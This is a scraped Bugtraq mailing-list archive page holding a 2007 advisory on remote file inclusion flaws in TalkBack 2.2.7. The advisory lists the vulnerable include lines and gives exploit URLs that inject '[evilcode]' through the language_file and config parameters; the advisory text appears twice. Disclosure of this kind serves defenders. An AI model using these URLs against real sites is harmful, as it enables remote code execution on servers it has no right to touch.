Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
TalkBack 2.2.7 Multiple Remote File Inclusion Vulnerabilities
Nov 21 2007 10:58PM
bugtraq opencosmo com
Opencosmo Security
http://www.opencosmo.com
========================================================================
==========================================================
# TalkBack 2.2.7 Remote File Include Vulnerability
Software : TalkBack version 2.2.7
Developer : http://www.scripts.oldguy.us/talkback
Discovered by : NoGe
Contact : pace[dot]noge[at]hotmail[dot]com
========================================================================
==========================================================
# Vulnerable file
comments-display-tpl.php
line 35 include $language_file;
line 172 include $config['comments_form_tpl'];
addons/separate-comments-mod/my-comments-display-tpl.php
line 35 include $language_file;
# Exploit
http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]
=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-t
pl.php?language_file=[evilcode]
========================================================================
==========================================================
# Greetz
all crew #papuahacker #baliemhackerlink #nyubicrew
skulmatic olibekas ulga Cungkee nyubi k1tk4t bius SiKodoQ newbie
yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ Fluzy str0ke
http://kapukvalley.net member
========================================================================
==========================================================
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
http://www.opencosmo.com
========================================================================
==========================================================
# TalkBack 2.2.7 Remote File Include Vulnerability
Software : TalkBack version 2.2.7
Developer : http://www.scripts.oldguy.us/talkback
Discovered by : NoGe
Contact : pace[dot]noge[at]hotmail[dot]com
========================================================================
==========================================================
# Vulnerable file
comments-display-tpl.php
line 35 include $language_file;
line 172 include $config['comments_form_tpl'];
addons/separate-comments-mod/my-comments-display-tpl.php
line 35 include $language_file;
# Exploit
http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]
=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-t
pl.php?language_file=[evilcode]
========================================================================
==========================================================
# Greetz
all crew #papuahacker #baliemhackerlink #nyubicrew
skulmatic olibekas ulga Cungkee nyubi k1tk4t bius SiKodoQ newbie
yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ Fluzy str0ke
http://kapukvalley.net member
========================================================================
==========================================================
[ reply ]